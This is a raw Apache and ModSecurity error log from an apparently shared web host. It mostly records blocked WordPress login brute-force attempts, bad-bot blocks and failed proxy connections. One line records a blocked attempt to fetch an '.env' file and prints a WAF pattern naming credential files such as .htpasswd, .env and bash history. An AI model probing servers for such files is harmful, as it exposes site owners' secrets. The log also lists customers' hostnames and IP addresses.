[Tue May 26 19:04:16.840155 2026] [autoindex:error] [pid 1045635:tid 1045838] [client 77.90.185.5:49392] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://ushaprec.com/
[Tue May 26 19:04:17.308506 2026] [security2:error] [pid 1045635:tid 1045678] [remote 52.18.195.140:48436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhWRhDcQXYr7SS5sUrFQAASio"]
[Tue May 26 19:04:17.814262 2026] [security2:error] [pid 1045635:tid 1045810] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhWRhDcQXYr7SS5sUrGwAAAC0"]
[Tue May 26 19:04:20.338976 2026] [security2:error] [pid 1045635:tid 1045700] [remote 162.240.102.228:49848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhXBhDcQXYr7SS5sUrXgAATEA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:21.285478 2026] [core:crit] [pid 1045635:tid 1045768] (13)Permission denied: [client 40.77.167.55:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:04:21.949413 2026] [security2:error] [pid 1045635:tid 1045711] [remote 35.176.253.230:38968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhXRhDcQXYr7SS5sUrgQAAcUs"]
[Tue May 26 19:04:22.410729 2026] [security2:error] [pid 1045635:tid 1045887] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhXRhDcQXYr7SS5sUrhgAAAHo"]
[Tue May 26 19:04:22.873874 2026] [security2:error] [pid 1045635:tid 1045695] [remote 193.42.61.12:41618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWhXhhDcQXYr7SS5sUrmAAARDs"]
[Tue May 26 19:04:24.401767 2026] [security2:error] [pid 1045635:tid 1045799] [client 74.7.230.45:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mosykay.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWhYBhDcQXYr7SS5sUr0QAAACI"]
[Tue May 26 19:04:24.402426 2026] [security2:error] [pid 1045635:tid 1045824] [client 74.7.230.45:45842] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mosykay.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWhYBhDcQXYr7SS5sUrzwAAO08"]
[Tue May 26 19:04:24.431778 2026] [security2:error] [pid 1045635:tid 1045789] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhYBhDcQXYr7SS5sUrwAAAABg"]
[Tue May 26 19:04:25.979620 2026] [security2:error] [pid 1045635:tid 1045876] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhYRhDcQXYr7SS5sUr8gAAAG8"]
[Tue May 26 19:04:27.009417 2026] [security2:error] [pid 1045635:tid 1045771] [client 185.191.171.5:34204] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahWhYxhDcQXYr7SS5sUsHwAAAAY"]
[Tue May 26 19:04:27.009552 2026] [security2:error] [pid 1045635:tid 1045771] [client 185.191.171.5:34204] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahWhYxhDcQXYr7SS5sUsHwAAAAY"]
[Tue May 26 19:04:28.821249 2026] [security2:error] [pid 1045635:tid 1045842] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhZBhDcQXYr7SS5sUsPwAAAE0"]
[Tue May 26 19:04:31.108977 2026] [security2:error] [pid 1045635:tid 1045844] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhZhhDcQXYr7SS5sUshwAAAE8"]
[Tue May 26 19:04:32.544542 2026] [security2:error] [pid 1045635:tid 1045827] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhaBhDcQXYr7SS5sUssgAAAD4"]
[Tue May 26 19:04:34.421440 2026] [security2:error] [pid 1045635:tid 1045717] [remote 212.224.100.2:49155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhahhDcQXYr7SS5sUs5gAAFFE"]
[Tue May 26 19:04:34.639330 2026] [security2:error] [pid 1045635:tid 1045796] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhahhDcQXYr7SS5sUs6AAAAB8"]
[Tue May 26 19:04:34.739829 2026] [security2:error] [pid 1045635:tid 1045722] [remote 212.224.100.2:49155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhahhDcQXYr7SS5sUs9gAAM1Y"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:36.194965 2026] [http2:info] [pid 6038:tid 6038] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:04:36.828728 2026] [security2:error] [pid 6038:tid 6186] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhbFHA3ZmGrHHEr4qQ-gAAAJc"]
[Tue May 26 19:04:39.188408 2026] [security2:error] [pid 6038:tid 6282] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhblHA3ZmGrHHEr4qRNQAAAPc"]
[Tue May 26 19:04:39.938942 2026] [security2:error] [pid 6038:tid 6187] [client 202.76.128.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhb1HA3ZmGrHHEr4qRSQAAAJg"]
[Tue May 26 19:04:40.792254 2026] [security2:error] [pid 6038:tid 6054] [remote 35.176.253.230:58698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhcFHA3ZmGrHHEr4qRYQABAQ8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:40.796255 2026] [security2:error] [pid 6038:tid 6266] [client 45.132.227.223:54559] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWhb1HA3ZmGrHHEr4qRPwAAAOc"]
[Tue May 26 19:04:41.677234 2026] [security2:error] [pid 6038:tid 6270] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhcVHA3ZmGrHHEr4qRawAAAOs"]
[Tue May 26 19:04:43.958531 2026] [security2:error] [pid 6038:tid 6278] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhc1HA3ZmGrHHEr4qRrwAAAPM"]
[Tue May 26 19:04:44.267795 2026] [security2:error] [pid 6038:tid 6066] [remote 50.6.192.190:42128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhdFHA3ZmGrHHEr4qRxAAAwxs"]
[Tue May 26 19:04:45.454641 2026] [security2:error] [pid 6038:tid 6292] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhdVHA3ZmGrHHEr4qR1wAAAQE"]
[Tue May 26 19:04:45.553033 2026] [autoindex:error] [pid 6038:tid 6260] [client 31.220.74.20:57810] AH01276: Cannot serve directory /home1/freshrlj/filosha.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:04:45.934766 2026] [security2:error] [pid 6038:tid 6074] [remote 50.6.192.190:42128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhdVHA3ZmGrHHEr4qR8QAA9CM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:48.167135 2026] [security2:error] [pid 6038:tid 6229] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhd1HA3ZmGrHHEr4qSJQAAAMI"]
[Tue May 26 19:04:50.358561 2026] [security2:error] [pid 6038:tid 6248] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWheVHA3ZmGrHHEr4qSZQAAANU"]
[Tue May 26 19:04:51.141746 2026] [security2:error] [pid 6038:tid 6202] [client 102.164.188.174:30386] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWhe1HA3ZmGrHHEr4qSewAApzA"], referer: https://erp.azurmediatec.com/salaries/card.php?id=26&save_lastsearch_values=1
[Tue May 26 19:04:52.136085 2026] [security2:error] [pid 6038:tid 6091] [remote 147.93.168.136:38940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.168.93.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhe1HA3ZmGrHHEr4qSkQAAwzQ"]
[Tue May 26 19:04:52.557942 2026] [security2:error] [pid 6038:tid 6256] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhfFHA3ZmGrHHEr4qSmwAAAN0"]
[Tue May 26 19:04:53.663670 2026] [security2:error] [pid 6038:tid 6097] [remote 147.93.168.136:38940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.168.93.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhfVHA3ZmGrHHEr4qSwgABAjo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:54.693892 2026] [security2:error] [pid 6038:tid 6211] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhflHA3ZmGrHHEr4qSzwAAALA"]
[Tue May 26 19:04:56.851270 2026] [security2:error] [pid 6038:tid 6239] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhgFHA3ZmGrHHEr4qTEAAAAMw"]
[Tue May 26 19:04:57.270025 2026] [security2:error] [pid 6038:tid 6125] [remote 185.190.18.72:48484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhgFHA3ZmGrHHEr4qTHAAAklY"]
[Tue May 26 19:04:57.551581 2026] [security2:error] [pid 6038:tid 6105] [remote 185.190.18.72:48484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhgVHA3ZmGrHHEr4qTKgAA6UI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:58.507138 2026] [security2:error] [pid 6038:tid 6204] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhglHA3ZmGrHHEr4qTPwAAAKk"]
[Tue May 26 19:05:01.080597 2026] [security2:error] [pid 6038:tid 6240] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhhFHA3ZmGrHHEr4qTeQAAAM0"]
[Tue May 26 19:05:01.306788 2026] [security2:error] [pid 6038:tid 6119] [remote 91.134.89.60:52922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhhVHA3ZmGrHHEr4qTggAAhlA"]
[Tue May 26 19:05:02.850772 2026] [security2:error] [pid 6038:tid 6245] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhhlHA3ZmGrHHEr4qTtQAAANI"]
[Tue May 26 19:05:04.755928 2026] [security2:error] [pid 6038:tid 6214] [client 114.119.151.72:46503] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/dgssi-officers-regionofindia.htm"] [unique_id "ahWhiFHA3ZmGrHHEr4qT9gAAALM"], referer: http://dgssi.in/dgssi-officers-regionofindia.htm
[Tue May 26 19:05:05.113037 2026] [security2:error] [pid 6038:tid 6138] [remote 119.18.52.246:34090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhiFHA3ZmGrHHEr4qT-wAA8mM"]
[Tue May 26 19:05:05.433203 2026] [security2:error] [pid 6038:tid 6211] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhiVHA3ZmGrHHEr4qT_gAAALA"]
[Tue May 26 19:05:05.839402 2026] [security2:error] [pid 6038:tid 6231] [client 222.253.215.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhiVHA3ZmGrHHEr4qUEQAAAMQ"]
[Tue May 26 19:05:06.202910 2026] [proxy:error] [pid 6038:tid 6282] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:06.202971 2026] [proxy_http:error] [pid 6038:tid 6282] [client 208.84.100.247:24490] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:06.203638 2026] [proxy:error] [pid 6038:tid 6282] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:06.203699 2026] [proxy_http:error] [pid 6038:tid 6282] [client 208.84.100.247:24490] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:06.357289 2026] [security2:error] [pid 6038:tid 6143] [remote 119.18.52.246:34090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhilHA3ZmGrHHEr4qUKgAA5Gg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:07.318607 2026] [proxy:error] [pid 6038:tid 6252] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.318662 2026] [proxy_http:error] [pid 6038:tid 6252] [client 208.84.100.247:29968] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.319229 2026] [proxy:error] [pid 6038:tid 6252] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.319257 2026] [proxy_http:error] [pid 6038:tid 6252] [client 208.84.100.247:29968] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.523288 2026] [security2:error] [pid 6038:tid 6241] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhi1HA3ZmGrHHEr4qUQAAAAM4"]
[Tue May 26 19:05:07.666654 2026] [security2:error] [pid 6038:tid 6154] [remote 217.174.148.179:44358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhi1HA3ZmGrHHEr4qUSAAAnnM"]
[Tue May 26 19:05:07.944620 2026] [security2:error] [pid 6038:tid 6204] [client 208.84.100.247:24532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/api/.env"] [unique_id "ahWhi1HA3ZmGrHHEr4qUWAAAAKk"]
[Tue May 26 19:05:07.945473 2026] [proxy:error] [pid 6038:tid 6188] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.945533 2026] [proxy_http:error] [pid 6038:tid 6188] [client 208.84.100.247:24612] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.945637 2026] [proxy:error] [pid 6038:tid 6262] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.945678 2026] [proxy_http:error] [pid 6038:tid 6262] [client 208.84.100.247:24646] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.945831 2026] [proxy:error] [pid 6038:tid 6267] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.945908 2026] [proxy_http:error] [pid 6038:tid 6267] [client 208.84.100.247:24672] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.946083 2026] [proxy:error] [pid 6038:tid 6217] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.946140 2026] [proxy_http:error] [pid 6038:tid 6217] [client 208.84.100.247:24662] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.946250 2026] [proxy:error] [pid 6038:tid 6262] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.946281 2026] [proxy_http:error] [pid 6038:tid 6262] [client 208.84.100.247:24646] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.946389 2026] [proxy:error] [pid 6038:tid 6188] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.946428 2026] [proxy_http:error] [pid 6038:tid 6188] [client 208.84.100.247:24612] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.946498 2026] [proxy:error] [pid 6038:tid 6267] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.946548 2026] [proxy_http:error] [pid 6038:tid 6267] [client 208.84.100.247:24672] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.946737 2026] [proxy:error] [pid 6038:tid 6217] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.946771 2026] [proxy_http:error] [pid 6038:tid 6217] [client 208.84.100.247:24662] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
